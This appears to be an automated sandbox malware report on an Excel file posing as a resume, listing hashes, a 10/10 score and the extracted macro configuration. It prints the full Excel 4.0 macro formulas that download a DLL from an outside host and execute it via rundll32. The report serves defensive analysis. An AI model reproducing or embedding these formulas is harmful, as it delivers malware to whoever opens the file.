Resubmissions

10-04-2022 07:53

220410-jq25nsgaen 10

10-04-2020 08:18

200410-tmzpvazbjn 10

General

  • Target

  • Size

    163KB

  • MD5

    0a054818926d97f4100774255a908dba

  • SHA1

    de572eddd30b34d1e328c8d5fb986cc1e04c82e8

  • SHA256

    0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2

  • SHA512

    21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://march262020.com/files/april8.dll

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://march262020.com/files/april8.dll","C:\ProgramData\ieTneVi.dll",0,0) =CALL("Shell32","ShellExecuteA",AE1177,0,"Open","rundll32.exe","C:\ProgramData\ieTneVi.dll,DllRegisterServer",0,0) =HALT()

Signatures

Files

  • William Smith Resume.xls
    .xls windows office2003